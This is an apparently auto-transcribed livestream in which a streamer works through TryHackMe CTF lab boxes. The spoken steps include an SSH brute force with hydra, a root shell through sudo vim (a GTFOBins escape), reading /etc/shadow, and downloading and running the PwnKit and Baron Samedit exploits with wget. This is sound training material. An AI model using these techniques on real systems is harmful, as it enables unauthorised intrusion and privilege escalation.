Based on the default settings, it will simulate.
Oh, all right. Good morning, everybody. Gonna do a bonus Sunday morning stream. Getting all set up still over here, just so I can make sure I can see everybody. Let's go to live. Let's go over here. Let's click on this. Let's make sure that Sunday morning stream. There we go. All right. So now I can see my chat window from both Twitch and YouTube. And we'll go ahead and get rolling this morning. Okay. Let me refresh over here. There we go. All right. So we're still working on simple CTF. We went down a couple rabbit holes on Friday, but now we're gonna try out this. I found another Python 3 version of this exploit, so we're gonna try it again. So let me go to the. I think I pasted this in all right. Let's go back to my Kali box, and let's try to run. Oh, I tried one more time to do this stupid FTP on this box. This is the problem with going back and doing some of these really old boxes, is that they become so old that they just don't work. And the FTP just will not connect. So I don't know why it struggles so bad. Oh, look, it did actually finally get a... Maybe we just haven't been patient enough. So let's do this. Let's... Anonymous. Okay. Let's do an LSLA. And let's just let it sit here and see if maybe the problem is it just takes forever to finally come back. Maybe that's the problem. So we'll see. Let's go back over to our here. There we go. And now let's try this guy one more time. Before I do that, I got to change this. I got to change this to the right. 250.37. Let's try this again. It was just failing out on me last time, something terrible. So it's showing me that it's finding these things, but it's not actually printing them out. So maybe we update the code a little and be like, hey, don't just tell me you found it, but like print it out. So let's go salt for, there we go. Org salt, ord salt, ord temp. Trying to find where if flag salt equals salt temp output plus salt found plus salt. Oh, so it's supposed to be putting the salt out, but it's not actually finding it. So something is wrong if it's not doing that. Huh. That's weird. Okay. So if that's the case, then, well, annoying little box. Okay, let's go back. While this is running, let's go back to our, oh man, that's like terrible to look at. I got the ping running. There's that FTP. We know there's a pub folder now because we finally did get it. Oh, there it is. Man, this is so slow. Change directory pub. What? Oh, okay. LSLA. Oh, now it's like working. Get for Mitch.text. All right, so I guess we got it. That is so weird. I guess patience is what we need. To just sit and wait on this FTP box because I got nothing better to do. Okay, let's cat for Mitch. Damn it, man, you're the worst dev I've ever seen. you set the same password for your system user, and the password is so weak. So I cracked it in seconds. Gosh, what a mess. All right. So we know that. We know that his password is super easy. You know, I don't like to, I don't really want to do an SSH brute force on this guy, but I know that it's a super easy password now. And this old exploit is just struggling so hard. Tweaker, we stopped right on Tweaker 169. We stopped right at the right moment there. Let's be bad and let's just try maybe try out a brute force on SSH, and we'll sgpt s hydra ssh user Mitch, right? Mitch, like that. Mitch, yeah. Mitch. And we're going to use, IP 10.10.250.37, and word list is user, user share word list rocku.text, I think. Let's see if SGPT can give me the proper. All right, copy. Let's go ahead and have it describe it just for funsies and see what it says. Specifies the login name, specifies the file. Okay. Looks good. Paste, go. Oh, okay, so I did do the password list wrong, I guess. User share word lists. Oh, it's word lists with an S. Okay. So we're gonna let this go. I know what this password is, I think, but I just wanted to let it run for a second. That guy's dead. Okay, well, while it's doing that, let's go ahead and run some. I also have the bounty hacker running over here. Oh, I need to add an hour to both of these before I forget too, because I'm going to run out of time. I'm only going to 7 today, or 8 Eastern. And I guess before we even do that, we should SQLI, like SQL injection. Is that what they want? Okay. What is the password? We don't have that yet. Technically, I know what it is, but technically we don't have that. And this was CVE 2019, and I've got it over here on my other screen. 9053, I think. Yeah. Well, this is definitely going to be SSH. We don't have a user flag yet. We don't know these other things. Okay, good. So we're caught up on that one. We're waiting on this guy. I don't know if this brute force is a good idea. Oh, did it already find something, or did it already? Could not connect. All right, so it's just going to die if we try to do that. So that's fine. This poor little box just can't handle that. So I know what the password is, and I really want to get on to what you guys know is my favorite part, which is the privilege escalation part. So let's see if we, this is on port 2222, I think. There we go. And the password is, there we go. So I got the password in there. And we are in. So let's take a little time this morning to enumerate this little box out and see if we can figure out some stuff about it. First, let's see where we are. We're in home directory Mitch. Let's do ls-lah. We've got a bash history that is not empty. So you can see here that It's actually got a few bytes in it, but I still don't know if that means we're going to be able to see anything or not. Oh, we don't have tab completion. This is a crappy box. All right, look. Yeah. Yeah, this thing's got history in it that basically tells you exactly how to break this box. Because I'm pretty sure, if I remember, this box has an SUID on Vim, and that's going to be our way to get out of here. So I'm kind of easy. It's kind of funny. All right, use echo user.text. What? Oh, oops. What am I doing? It's way too early in the morning. I need a cat user.text. Oh my gosh. Way too early. Was that even in the... Oh my gosh. So... Copy. Okay. Let's go over here to notes. We need to clean our notes up. Our notes are terrible. Username Mitch. Password secret. No joke. That bad. User flag. Good job. Keep it up. Okay. And we're going to try that at sudo L like they did. And yeah, we can run Vim with no password. So we're going to go to a spot called GoBins and find out how to do it. Python command Python. Actually, let's do which Python which Python 3? Python 3. Okay. So we have Python 3 in here. So we can do Python 3 command import pty. I always like to type this one out just so I never forget it. Spawn bin bash. I could copy it, but there we go. Mitch machine. Let's LH home. There is another sunbath. Okay, there is another user on here because it asked. Oh, it wants that flag too. Is there any other user? Sunbath. Okay. Let me go back to my notes and put in here that we found another user. User flag. Other user. Sunbath. Okay. And one of the other things we always want to do is cat Etsy password, because that'll show us any other users on here. So here's Mitch. Let's cat Etsy password rep sun. There it is, sunbath. Oh, there it is right there, sunbath. So there's the sunbath, the SQL, because it's got MySQL, the FTP, create a user for FTP. Mitch has got a user. I have no idea. I didn't know SSHD has a user. I don't remember that. I don't know if I've just never noticed that before or what. But... Okay. Okay, so now we've got that. We've got the... we know what to do. So let's go to GoBins and find out how to do this. Now, if you've never heard of this site, it's GoBins. Is it like that? GoBins. Living off the land. Oh, I forgot what the dumb site is called. I'll find it here in just a second. Let's see. My OP here. There it is. I've got it under OP or overpowered. All right. So let's copy that. And let's go over to our, since I've been making new notes. Oh, not those notes. We want to go to our overall notes for everything. Those are useful commands. Let's do useful websites. Useful web tools. That works. Okay, and we're going to put in here, paste, go bins. Okay. GTF obins. I always say it wrong. That's the problem. Okay, so let's go back here and look at it. We got to search for Vim. And there it is, Vim. And we see here, you can get a shell to break out. You can do this command Vim. Okay. A shell. I think we can just go straight. It has a reverse shell down here. We don't need to do a reverse shell because we've already got a shell. We logged straight in with SSH. So instead here, hey, what's up, buddy? How are you doing? I'm doing great. Bonus episode today. I had a little extra time this morning, so trying to get this stupid box rooted out. So thanks for coming by and seeing me while I'm struggling. So here we go. I'm gonna paste that in. I need to paste that back in over here on my notes for this box. So here we go. So Vim SUID. Well, actually, it's Vim no password is what it really is. No password. You know what? I didn't. This is where Copilot is kind of fun. Let's see if Copilot would have just given me the answer if I asked it. Command for root shell from Vim with no password. Huh. Sudo u root vim c set shell set args. I wonder if that'll work. I love Copilot. See, this is the thing with Copilot. You forget that it'll just give you stuff. I'm like, we're so used to, I have to go Google it. But not necessarily. Not with Copilot. Copilot knows a lot of this stuff already and doesn't, you don't need to go get it from Google. But I don't know. Maybe this one won't work. Sudo vim command. It looks like it's going to work. It's just got some extra stuff in it to probably maybe stabilize the shell or something like that. So let's see what happens here. Oh, man. It didn't quite work like I thought it would. Okay, that didn't quite work. Let's use the go bins then. The simple little go bins command that it had. Oh, did I not paste it in from over here? It's right here. Let's try this. Let's go here. I didn't want to get rid of that. Did I really just do that? I totally hit the wrong key and wiped out my own copy paste. I hate it when I do that. There we go. All right, now back to Cali. Oh, seriously, trying to wake up this morning. Brain is not working as fast as usual. Copy. Paste. Oh, wow, that is but ugly. But I think it may have worked. Who am I? Oh, man. Did not. It is so ugly. Okay. Now maybe it'll work. Who am I? Mitch. Okay, so that didn't work. Huh. All right. So I can run vim no password as root. I can run vim no password. I just need to experiment a little more with these commands. It's not SUID, sudo. The binary is allowed to run as, oh. It does not drop the elevated privileges and may be used to access the file system or escalate privileges, okay? Vim. All right, let's just, isn't this the one we just tried? Let's see if it's any different. Oh, we gotta run it as sudo. Oh my gosh, I'm so dumb. Oh yeah, cursor is amazing. I love cursor, and I love being able to just do the Copilot inside here. It's great. It is great. So let's go back to Kali, and now we're gonna run that same command, but we're gonna run it as sudo. So let me go over here. Okay, copy, paste. There we go. So we ran that as root this time. Oh yeah, it's root. Now here's the thing. I should have recognized this before. Now we know we're root. See, we have the pound sign for our cursor, whereas before we had a dollar sign. The dollar sign is for a regular user. The pound sign is for a root user. So you should just be able to, at a glance, know if you are a root user or if you are a regular user. So now when I do who am I, I'm root. And now I can ls, and I can see that's because that's where I'm at. I'm still in Mitch. So we're gonna this time we are gonna be lazy, and we're gonna go over here. And do I not have my, oh, it's in my notes. We're just gonna copy our little guy here. Copy, paste, and oh, why didn't that? Oh, that's the wrong one. Dang it. Again, the brain is just not working this morning, and I don't know why. We want this guy. This guy. Copy. Control V. There we go. Now we got a nice root. Full bash shell. And there is a root.txt, and we're gonna cat root.txt. Yeah, we'll go ahead and do that. Well done, you made it. Yeah, we did. Copy, let's go back to our notes. And we'll put it in here. There was user flag. And the root flag. Okay. Yeah, we're in. Oh yeah. So now that we're here, we're gonna go back down to a regular user, and we're gonna try out that new. See, you're gonna be glad that you showed up this morning, because we're gonna go ahead and try that new script I found. That is called. It's not a new script, it's an old script, but I found it, and it's called Fall of Sudo. So we're going to try the Fall of Sudo here. Oh, what? Where's my, oh, there it is. Accept? Oh, I don't know why it's doing that. Let me see here, hold on. I'm trying to get it to let me, see this little box? Damn it. I gotta finish, we gotta finish converting this guy to Python 3, but let's do that real quick. Control K, convert this code to Python 3. This script was so long. Yeah, I've seen little scripts that do that, that make it look like you got some fun Hollywood hacking going on. There's also always like a hacker typer on the web that you can go to, and you look like you're doing the crazy stuff. It's probably exactly the same thing except for the terminal. So there we go. So there, oh, there's still what is wrong with this thing? Oh man, this thing has so many lines to it, and it was in Python 2. Control K. Convert this code to Python 3. This shouldn't take long because there's just a little bit here. And then finally this whole script should be converted. I really hope it works because you can see how many lines of code this is. A lot of it is very repetitive. There we go. It feels like a lot of this could have been, I don't know though, because he's actually got the stuff that's happening with each one of these. So anyway, so let me go try that. Hacker typer. Yeah, let me see here. Let's look at it real fast. I'm pretty sure that's what it's called. Hacker typer. Yeah, hacker typer. There it is. And it's just, we gotta get it. I'm gonna break in. I'm so close. Anyway, there you go. So that's that. All right, back to the real stuff now. Okay, so let's try. Let me see if my HTTP is still up. That's the other thing I've got to look at. So I had 2 terminals up. I closed it. Okay, so let's open another. Actually, we'll do it on the Kali box this time so it stays up. So we got OpenVPN here. We got cursor here. I'm pinging the box here. That's where we actually have our shell. So let me pull this one over to the end, and then we'll make this one our. Let's clear this one. Let's drop a directory. Let's go into tools, HTML. And then let's go in here. Yeah, this is what we want. And then we want to do sgpt s Python HTTP web server here on port 80. And yeah, there we go. I need to just remember that one. It's too short. I feel dumb every time I have to ask it. No, abort, because we want to run it. There we go. All right, so there it is. So that's up. So now we can go over here. And, oh, I didn't see which. Surely this guy has wget. Yeah. Okay, so we've got to do wget. And I don't remember what another new tab. I don't remember what my IP address is currently. It is 10.6.87.88. Copy. Paste. Okay, wget. Oh, I did. Dang it. HTTP. There we go. And then what is this guy called again? He is named Fall of Sudo. Python 3. Rename. Copy. Just so I can get that name right. Oh, I did it on the wrong machine, though. Oh, well. I'll just kick this guy over so I can see it. All of... Never run this one. I have no idea if this is going to work or not. Sudo p3.py. Yeah, all of sudo p3.py. Yeah, exactly. You're right. It just, that way I don't have to hold it in my brain. I can just move on about my day and just ask when I need to. Okay, so we got that file. Oops. ls chmod plus x fall of sudo should have made this a smaller file name .py. Run fall of sudo underscore p3, really questioning my life decisions about naming files, p3.py. Syntax error, of course. Of course. Let's go over here to cursor, and we'll go to here. And no, I want to go to follow sudo. Tools, HTML, follow sudo. Okay, so we're gonna hit the K. I think Control K. I got this error. I want to see if this works like I think it's gonna work. We didn't actually highlight anything. It's just here in this code somewhere. What? Okay. Okay, go off. I don't know what that just fixed. It didn't look like it fixed anything, but yeah, it's still getting that error. We're going to go hardcore on this. So let's go hardcore. And by hardcore, I mean Claude. So there's that. Let's go to here. Let's open up Claude, where I can multimodal paste in. I am getting this error. Here is the code. Please show me how to fix it. Now I got to get the code here. Oh man, this thing's long too. It's going to be mad at me because this thing's like, oh my gosh, it's so big. All right, so copy back to Claude. Paste it in. There you go, buddy. Good luck. Gives me time to drink some coffee while it's doing that. All right. What line was that? What is it? What did it even change? Let's look very closely here. I don't see any change. Replace this line with this line. Print F star sudo less file. I don't see any difference. What? The placement of the F before the string in F strings. Yeah, it didn't correct the code. That's what's funny. Oh, I guess. Oh, I've just never seen it like that. That's not the way I would have done it. Remove the space between the F and the opening quotation mark. What? This turned into a Python lesson. Let's, well, okay, so, damn it. Let's see if we can find this line in the code period. Control F. There it is. There's only one line like this in the whole thing. It feels like, for one thing, it feels like it should be like this. When I've used F strings in the past, it doesn't work like what this guy is. Oh, I kind of see what he's doing now. I don't understand why. Normally with an F string, stick the F string right at the very front. You don't have variables outside of your F string. But I guess this would work just fine because I use F strings like this when I make variables. Let me go back and see what the actual error is again and quit being a lazy ass and see what is actually happening here. Okay. It says that the error is right here. File line F. What if I just... Usually when you have an error like that, it's the line before it that's the problem. All these other ones, is there really no other place in this code where it's using this kind of setup, where it has this F? Yeah, it does it in 10 other places. So what is different about that one than all of these? Because these are all fine, unless that's the very first one it's hitting. Let's go back over here. Yeah, the extra space, but I don't that doesn't make sense to me how that would. Yeah, it does. You're right. I'm not trusting it. That's my problem. I'm trying to be smarter than the... But here's my problem. When I look here, there's literally no difference between these two lines that I can see, unless I am just insane. I have no idea. This is a file that was converted from Python 2 to Python 3. Does that change anything? Let's see. There we go. Here's how you can modify the line to work in both versions. That looks better. Yeah, let's try this. Copy. If you're targeting 2 and 3, you might want to add this import line. This allows you to use Python 3 print syntax. I feel like we already did that, but... Oh man, this is another problem with... This is a problem that should go away as we keep doing more boxes, because the problem is we're reaching back to an era where they... what am I trying to say? We're reaching back to the pre closure of Python 2. And because Python 2 has now been sunset and now Python 3 is the only thing that exists, there's a lot of code out there that still exists as Python 2, and it's just never gotten fixed or never gotten updated. So you go back and try to do these old CTF boxes, and you're stuck with this old Python 2 code. Why doesn't it like less user now? Less user is not defined. Or are we not in the right place? I thought this was our problem. Where was the line? By the way, this is where this kind of stuff can start getting boring. And I always feel bad when I'm doing like a stream and we like start getting into the weeds like this. I always hope people are okay with getting into these kind of weeds. 967. We're a little lower. Oh, this scares me though. This makes me think that that was just the first place that it caught it. I'm about to abandon this and just move on about our day. Oh man, SGPT. I'm trying to install SGPT. SSH connection is set up through cursor. Okay, when SGPT is ran, it gives me like 20 errors at once. Could it be it doesn't run on a free open? Yeah, it does. You have to put your open API key in it. Yeah, you have to go get an open API key and put it in there for SGPT. Yep. So you'll have to go get the API key first. Your API key first set up. You may have to check. It may have ways to run other things too, like Grok. But obviously, if you want it to do its best, you're going to want to have an Open API key in there. I would put a Claude key in it. I mean, an Anthropic key for Claude in it, but I don't know if he has that yet. At least that's not default. So I just go ahead and put the GPT 4.0 in it, which is fine normally for just the little stuff we're doing. All right, we're gonna move on from this for now because this thing obviously is gonna need a little more tweaking. What we can do though, before I go this morning, is we're still gonna stick with this box and we're gonna go ahead and get LSE though, and we are gonna run LSE in here. That's the Linux Smart Enumerator copy. Because this box was too easy and we didn't need to do that in the beginning, but we're just gonna do it because we're trying to see what other ways we could use to pwn this box, little pwnage. Yeah, it's got to be a paid Open API key for SGPT, because it's just all it is the code. That's all SGPT is just the code, and you are providing a key for it to be able to work against Open API. I mean OpenAI's API. That's what I'm trying to say. Do we know the current password? Yeah, we do, actually. One of the rare times we do. Okay, so we're running this guy. I really don't care about this early stuff on this one. What I'm looking for is I just want it to come back and say that it is susceptible to like we looked at before, PwnKit or the Baron. What is that? It's Baron something attack. Those are the two. Baron S is what I'll call it. Those are the two that you have to have to be able to do, or you don't have to have them, but they're the two that are real common on these old boxes. This is almost done. And then we'll run that and we'll see if we got it. Oh, look. So while that's going though, let's look here. So we already saw this guy. Here was it says the, binaries that are set up with the SUID. So technically Vim did not have it on this one. This was not an SUID with Vim. With Vim, what it was we were given permissions to run Vim without a password. So the user was given sudo level privileges for Vim, and that they didn't have to use a password. And that's why we were able to exploit it. Etsy Shadow. Oh, there are passwords in Etsy Shadow. That's really rare. We could actually go in and try to crack this password for Sunbath if we wanted to. That's why they did that. Yeah, Etsy Shadow. Used to on Linux systems, I guess, back in the day. I'm too young to know about this. So back in the day on Linux systems, they used to keep the keys for the passwords in Etsy Shadow. They don't do that anymore because of cracking. Cron tabs. Oh man, just wait. We're gonna get into that. Becomes like a big joke in the CTF community a lot of times, is that they're like, oh man, I got this cool new CTF box I made about this new vulnerability, and they're like, yeah, what's your privilege escalation? And then they're like, oh, a cron job. Because that's like the go-to thing for privilege escalation, is to make a misconfigured cron job. We'll get to those. Right now, we're still doing a lot of SUIDs and things like that. Okay, so we're getting down here to the bottom. Can we connect to MySQL root without a user? Yes. Doesn't matter. We're already there. We'll have a couple boxes we'll run across that'll be like that, where you use MySQL to get your root. Can we write to any processes in the binary? Yes. Baron von Samedit. That's it. Yes. And Dirty Pipe and PwnKit. Okay. We didn't try Dirty Pipe yet. We might try that. I don't know. Let's real quick at least try PwnKit real quick, because it's just always fun. HTTP 10.10.10.87.88/PwnKit. I think that's it. Oh, did I? What did I name it? I thought I named it PwnKit. PwnKit. It's right there. PwnKit. What did I type? Am I not? Did I? Or 10.6. Oh my gosh. wget http // 10.6.87.88 / PwnKit chmod plus x PwnKit and just run it. PwnKit. Unexpected syntax error. Oh, I'm already. That's why. I'm already root. We're still. We were still in the root through that we had through the. I may not be able to run this now. I may have to download it again because it was. Yeah, I think. Let's change back to our directory. Okay, there we go. Now let's download it again. That was funny. I'm already root. Can't escalate to root if you're already root. That doesn't work. 10.6.87.88 PwnKit. Let's see if we can do this all in one line like crazy people. And chmod plus x PwnKit and just run it. PwnKit. Let's see if that one-liner works. Oh, what? PwnKit operation is not connected. Interesting. So it says that it can be that PwnKit will work on this one, but it doesn't look like PwnKit is working on this one. It looks like it's and that's what's interesting, because sometimes it works like a charm and sometimes it doesn't. So PwnKit didn't work on this box. Let's try to get the other one just in case. wget http 10.6.87.88, and then what's our other one we have in here? We've got the Baron S pi. Okay. So Baron _ s dot pi. All right. Chmod plus x Baron s dot pi. Run Baron s dot pi. Too old. Exploit is relied on GCC new version. Huh. So this box. So here's what's interesting. I think. Yeah, super root. I think the thing is this. I think this box is so old that yes, the sudo vulnerabilities exist, but the libraries, like see this glibc. The library glibc is older than the version that's used in the exploit. So the box is so old that the exploit is too new for the glibc that's on it. So the version of C, the actual programming language C, is too old for the exploit. So that's funny. That's how old this box is. All right, and that's it. We're gonna call it a day on this box because I am over this box. I remember now. Some of these early boxes just drive me nuts because they've got some weird issues. I feel like they leave them on just so younger. It's a double-edged sword, right? Like if you're just starting out and you look and you're like, oh yeah, these are the like classic boxes that everybody works on. But the problem is that there's a lot of gotchas in here that are very frustrating. And if you're just starting out, you're like, how the frick am I ever supposed to learn this stuff if there's all these weird things, right? Like oh, the FTP, you got to wait for 10 minutes for it to come up and work. And oh, the exploit that's supposed to work on it doesn't even work anymore because you can't get Python 2 to work on your Kali box. Like I can see how it's very hard for some people to be able to break in and start learning things. And so that's why I always tell people in the beginning, don't be afraid to do like you're doing right now. Just watch walkthroughs and learn, right? There's always going to be another box. There's always another box out there somewhere to go work on. So don't feel like, oh man, if I watch Knox do these, or if I watch IPSec, or if I watch John Hammond, I'm never gonna learn anything. But you are gonna learn, and you're gonna go to the next box, and you're gonna eventually be like, oh yeah, I remember this. I remember this thing we did, or I remember this time we had to do this other thing. You'll get it. It'll be fine. I guess what I'm saying is don't get discouraged by goofy boxes where you have to go look something up. That's the wrong thing to do, and I think a lot of people do it. They're like, it's just too hard. A lot of times I use the illustration of a new music genre, right? If you are trying to branch out into a new music genre that you've never listened to before, and for here in the United States, I'll say, like country music. I'm gonna start listening to me some country music. Well, if you've never listened to it before, it's probably going to be aggravating. You don't know who the artists are. You don't know the songs. You've never heard this stuff before. And so to your ear, it's going to be very foreign and very strange. But you know what? If you keep listening to it and you force yourself to listen to it for a couple of weeks, just a couple weeks, all of a sudden your brain will start to remember, and you'll catch yourself humming those songs. You'll be like, oh man, my dog got run over and I drank some beer. That's not a real song, but you'll start humming that song, right? And so as time goes by, your brain will get used to that country music, and you'll start to understand it, remember artists, and learn things. And it's the same thing with this. You've got to just keep fighting through that, unfamiliar territory. Right? So, hey, by the way, we keep taking Frank here, my Frank profile. By the way, this is not my normal profile. I have another profile. That's my actual profile, and I don't use it because I don't want to like discourage people and like see like, oh my gosh, it's like this high ranking and everything else. Although Frank is already up to 300,000, so he's already up there. So, I mean, it'll be fun to watch as we keep doing rooms if the little Frank profile just keeps moving up into the rankings here and he becomes a CTF and cybersecurity master as we keep moving up. Okay, so I guess in my last like 5 or 10 minutes here, let's go ahead and at least do some recon on on Bounty Hacker. So let's go into here. Let's make sure we're closing this guy up. We're done with you. Let's create a new folder here. New folder. Bounty Hacker. Bounty Hacker. All right, there it is. Bounty Hacker. Let's make a notes file. New notes.md. Okay, so we're ready to go. We got a Bounty Hacker folder. We got a Bounty Hacker notes file. We're going to go back to Kali. We are going to get out of here, exit. Yeah. It's still trying to get into this. What the frick? I am so over this box. All right, clear. Just get that all off my screen. I don't want to see anything about that dumb box anymore. So over that box. Okay. Let's get the IP address from Bounty Hacker here. It's 10.10.152.2. I guess I'm not even ready for that yet. I got to change directory into Bounty Hacker. And now we're gonna history lazy history grep InMap. There it is. And we're gonna do, here it is. Let's take this guy. I just need this part of it. I'm so lazy. Gonna paste things. Okay, so space O-A bounty hacker InMap 10 dot what? 10.152.2. Right? Is that what I said? We're going to go for it. 152.2. Okay. Ping 152.2. All right, we're good there. Almost done. Says it's done. Oh, it's doing, it was done. Okay. So this just has 20 and 80. All right. So now we're going to history grep GoBuster. GoBuster. Yep. And so eventually we won't do it like this. We will get we'll get a little script to do this for us, because this is just entirely too much work. I mean, I have to like click on things, and I have to copy and paste. I mean, man, it's just so hard on me when we could just have an automated script that just does all this for us. Why does it think it needs, oh, because there was a slash on the end of the line. Okay, so we're scanning now this guy. While we're scanning that, we're going to let this guy run. You know, I really do. You say in case of doubt Metasploit, but I really try not to do Metasploit if I don't have to. I mean, maybe I'm just being picky. I mean, I'm super lazy, but sometimes Metasploit just feels too lazy. I am probably wrong. I probably shouldn't feel that way. Somewhere along the line early on, I probably heard someone like me that I was listening to be like, Metasploit is for script kiddies. And then I probably made the decision that I was like, I'm not going to be a script kiddie. I'm not going to use Metasploit. So I probably need to rethink that. I probably need to quit being a pain in the butt about that. All right. We've got here the Cowboy Bebop picture. I can't remember if these pictures have any steganography in them, but we'll have to figure that out later. Oh, look, you're finally up. It's about time. 3 more minutes. You were going out with the garbage. Jet. Now you told Spike here you can hack any computer in the system. We'd let Ed do it, but we need her working on something else. And you were getting real bold in that bar back there. Now take a look around and see if you can get that root system. Don't ask any questions you know you don't need the answer to. If you're lucky, I'll even make you some bell peppers and beef. Ed, I'm Ed. You should have access to the device they're talking about on your computer. All right. So there's that. We know there's an images. Yeah, Metasploit. You are right. Metasploit is useful. I still do stand by the idea though that you could use Metasploit and then excuse me, if possible, after you use Metasploit, maybe try to solve it without the Metasploit. So maybe use Metasploit first and then do a little research and see if you can do it on your own. Okay, so that's just the picture, and that's it. Okay, and then what was the other? This thing just had, it's just 22 and 80. Oh, there is an FTP. Another FTP. Okay, but is it, it doesn't say it's anonymous, though. Let's open another one here. We already got this. We don't want to mess that one up. Let's open another tab. Change directory. Repos, notes, bounty hacker. Okay. And then in here, let's FTP 10.10.152.2. Oh my. FTP, not FPT. FTP. I got this down in the... Move it up a little. There we go. Anonymous. It let me in. All right, so it's the same thing again here. We're going to have to like let it sit here and try to see if it pops up on its own and we get anything after a little bit. It may just time out. And the images are going. And I feel like we need to download this image and again check it for some steganography. So let's save the image in pictures. That's fine. So we saved that. Are we gonna have to open another one? Yeah, let's open another tab. Let's change directory to downloads. I'm gonna have to get off here in like a couple minutes, like 2 minutes. But it's been fun. I got my fun weekend shirt on, and we at least got through that stupid simple CTF box, and we're at least on to something else now. I want pictures, not downloads. Down a directory, change directory, down a directory, pictures, there we go. Crew.jpg. Okay. So, sgpt s steg onography crew.jpg. I don't know if that's going to do anything. I didn't really tell it a whole lot there. All right, steg hide, embed. What? Oh, to hide, file to hide. No, I want to, like, abort. I want to decode. Search for hidden stuff. Again, just me being lazy. I will be on again tomorrow too. We'll see if that works. Oh, what the frick? What a nice little bit. Man, look at this thing. He gave me a one-liner to do like about 5 things at once on this file. Let's see if before I go, let's see if this does anything. Let's see. Let's do that. Steg hide was not found, but we want to install it. Yes. Yes, please install steg hide. Okay. Oh, I don't have a passphrase. Okay. So steg hide needs a password. And I guess the rest of these don't have anything in them. Strings. Strings really not have anything? Just nothing at all. Oh, strings, plural. There are strings in here. I don't know why they didn't come out. Now this I have never thought of trying at all. Man, there's a lot of junk in here. Crazy. Look at how big that buffer is. Okay, let's do it into a file. Oh, no, I need to do, hold on, no. Strings, JPEG, into repos, notes, bounty hacker, strings.text. Okay, now let's try this. Yeah, we're going to do we're going to do cat repos, notes, bounty, reverse engineering, strings, and pipe that into SGPT, and we're going to say This is the output from strings on a JPEG file. Do you see anything interesting? We are working on a CTF box from Try Hack Me. I feel like I have to give it that context because remember, SGPT has no context. So it has no idea what I'm doing unless I tell it. So let's see. We'll do this and then I'll go. Oh, this is cool though. The output you've provided appears to be a mix of EXIF data, Photoshop metadata, and possibly some stuff. They're all blah, blah, blah. Photoshop metadata, blah, blah, blah. XM data, blah, blah, blah. However, from a CTF perspective, sometimes metadata can have blah, blah, blah. Blah, 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 blah. But you're not telling me anything. However, without the actual file and the string... Oh, you didn't get it? I piped it in. I thought I piped it in. What? Isn't that what we just did here? Cat that into... Okay, let's hold on. Did I not cat the right file? Ah, dang it. Oh my gosh, I'm like clicking around on things. There we go. Cat. It's... What the frick? I'm piping it in. However, without the actual file. Oh, and just the strings output. It's a challenge to determine if there's anything specifically interesting. Okay. Well, that tells me that it didn't find anything. It has file input. SGPT-H. Oh, SGPT. There's a REPL. There's a lot of it I haven't learned how to do yet. Look, we can change the model. We can change the temperature. That's the shell. This is the one we use all the time. You can. Oh, that's right. We can go into an interactive mode. That would be kind of fun. You can just straight up do a describe, generate only code. Oh, wow. I didn't know that. That one's cool. We need to remember that one. Because then we can use it to say we need a Python to do X. Chat, REPL. Role. Yeah, we can actually switch the role. When we need to do that one of these days, we can actually create custom roles. So we could create a custom role that says like, hey, look, you're a hacking assistant. You're a CTF hacking assistant. Not just the standard SGPT. All right, well, we're just going to stop there today, though, because I've got to get going. It's past my time. I'm having way too much fun. But, hey, great seeing everybody. Thanks for coming by. And I will be live again tomorrow morning. Same time, actually. I'm going to do 7 to 8 tomorrow morning, too. And I think I'm going to try to do Tuesday morning, 7 to 8, before I fly out to Black Hat in Vegas. And hopefully I'll record some shorts while I'm out there so you can kind of see what I'm up to while I'm out there. All right. All right, guys. Yeah, that is going to be another upcoming video. All the just a deep dive into SGPT. So, okay, everybody. Everybody have a wonderful Sunday. The rest of you.